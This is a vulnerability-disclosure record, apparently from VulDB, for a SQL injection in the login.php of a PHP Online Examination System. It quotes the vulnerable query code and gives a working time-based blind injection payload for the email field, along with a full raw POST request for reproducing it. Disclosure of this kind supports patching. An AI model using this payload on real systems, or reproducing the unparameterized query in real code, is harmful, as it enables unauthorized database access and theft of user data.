提交 #847385: SQL Injection Vulnerability in `login.php` of the Online Examination System v1.0 SQL Injection信息

标题SQL Injection Vulnerability in `login.php` of the Online Examination System v1.0 SQL Injection
描述# SQL Injection Vulnerability in `login.php` of the Online Examination System The user login function of the Online Examination System is handled by `login.php`. The login form in `index.php:396` sends a `POST` request to `login.php?q=index.php`. In the backend code, `login.php:8` and `login.php:9` directly read the `email` and `password` parameters from user input, and `login.php:12` concatenates the `email` parameter into the SQL query: ```php $email = $_POST['email']; $password = $_POST['password']; $password=md5($password); $result = mysqli_query($con,"SELECT name FROM user WHERE email = '$email' and password = '$password'") or die('Error'); ``` Although the password is hashed with MD5 before the query is executed, the `email` parameter is not filtered or parameterized. As a result, an attacker can inject malicious SQL through `email`, causing a SQL injection vulnerability. Based on the provided request packet, this issue can be reproduced as a time-based blind SQL injection. ## Impact of the SQL Injection Vulnerability An attacker can use this vulnerability to probe the database through the user login interface and confirm whether SQL injection is present. Once confirmed, the attacker may further attempt authentication bypass, extract sensitive data, enumerate tables and columns, or target user account information stored in the system. In practice, this can affect the confidentiality and integrity of exam-related user data. ## Payload Injection parameter: `email` Injected value: ```text [email protected]'and(select*from(select+sleep(2))a/**/union/**/select+1)=' ``` Request method: `POST` Request path: `/login.php?q=index.php` Raw request: ```http POST /login.php?q=index.php HTTP/1.1 Host: project1 Content-Length: 92 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Edg/x.x.x.x Origin: http://project1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://project1/index.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: PHPSESSID=2347fp9qoucglmem34csap1fbp Connection: keep-alive [email protected]'and(select*from(select+sleep(2))a/**/union/**/select+1)='&password=head ``` If the application response is delayed by about 2 seconds after sending the request, it indicates that the `email` parameter is likely vulnerable to time-based blind SQL injection. ## Sources Download ``` [Online Examination In PHP With Source Code - Source Code & Projects](https://code-projects.org/online-examination-in-php-with-source-code/) ``` [Online Examination In PHP With Source Code - Source Code & Projects](
来源⚠️ https://github.com/zzzxc643/CVE1/blob/main/project1/vul2.md
用户
 SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200)
提交2026-06-04 05時57分 (1 月前)
管理2026-07-04 07時55分 (1 month later)
状态重复
VulDB条目342838 [code-projects Online Examination System 1.0 Login Page /index.php 用户 SQL注入]
积分0

Want to know what is going to be exploited?

We predict KEV entries!